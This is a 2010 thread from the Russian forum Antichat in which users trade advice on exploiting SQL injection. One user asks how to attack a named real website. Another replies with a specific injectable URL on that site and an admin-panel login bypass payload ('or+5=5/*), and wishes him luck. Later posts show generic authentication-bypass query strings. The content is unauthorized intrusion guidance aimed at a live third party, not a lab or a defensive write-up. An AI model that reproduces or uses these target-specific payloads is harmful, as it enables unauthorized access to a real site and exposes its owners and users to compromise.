ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12041  
Старый 16.03.2010, 19:27
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
Слепота в каком месте???
Бля ошибок - нет(не было). Или я туплю
 
Ответить с цитированием

  #12042  
Старый 16.03.2010, 19:33
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме:
1128838

Репутация: 36
По умолчанию

если error_reporting(0) это уже блинд?
 
Ответить с цитированием

  #12043  
Старый 16.03.2010, 19:34
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

неа! если error_reporting(0) то токо ошибки отключаются, а не выводимые поля
 
Ответить с цитированием

  #12044  
Старый 16.03.2010, 20:07
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Скажите вот есть сайт:
Цитата:
http://www.oxta.ru/index.php?id=152
При вводе кавычек нет ошибки (пробовал '; -- и ' vav va).
Таких сайтов много видел как с ними работать? Как можно раскрутить скулю на таком сайте?
 
Ответить с цитированием

  #12045  
Старый 16.03.2010, 20:09
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от CyberHunter  
Как можно раскрутить скулю на таком сайте?

а она там есть?
 
Ответить с цитированием

  #12046  
Старый 16.03.2010, 20:11
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от CyberHunter  
Скажите вот есть сайт:

При вводе кавычек нет ошибки (пробовал '; -- и ' vav va).
Таких сайтов много видел как с ними работать? Как можно раскрутить скулю на таком сайте?
Я с тебя херею.... Ты думаешь что скуля на всех сайтах?
 
Ответить с цитированием

  #12047  
Старый 16.03.2010, 20:13
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

CyberHunter, перестань задавть эти вопросы и прочитай хотя бы одну статью по SQL-инъекциях.
 
Ответить с цитированием

  #12048  
Старый 16.03.2010, 20:29
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
Сообщение от CyberHunter  
Скажите вот есть сайт:

При вводе кавычек нет ошибки (пробовал '; -- и ' vav va).
Таких сайтов много видел как с ними работать? Как можно раскрутить скулю на таком сайте?
там нету, но есть например здесь
Код:
http://oxta.ru/news.php?y=2009&m=12+and+5=5
и кстати не стоит замарачиваться, тут тот тоже скуля есть:
http://oxta.ru/admin
login: 'or+5=5/*
password: asdfg
удачи

Последний раз редактировалось warlok; 16.03.2010 в 20:31..
 
Ответить с цитированием

  #12049  
Старый 16.03.2010, 22:49
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'

Можно в админку попасть тут?
 
Ответить с цитированием

  #12050  
Старый 16.03.2010, 22:53
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от попугай  
select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'

Можно в админку попасть тут?
поидее да, если пароль верный, и админ первый в таблице. А закомментить строку так можно?
Код:
select * from users where login='admin' or 1=1+--+'
если да, то зайдёшь под логином первого из результата select * from users (обычно админ)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ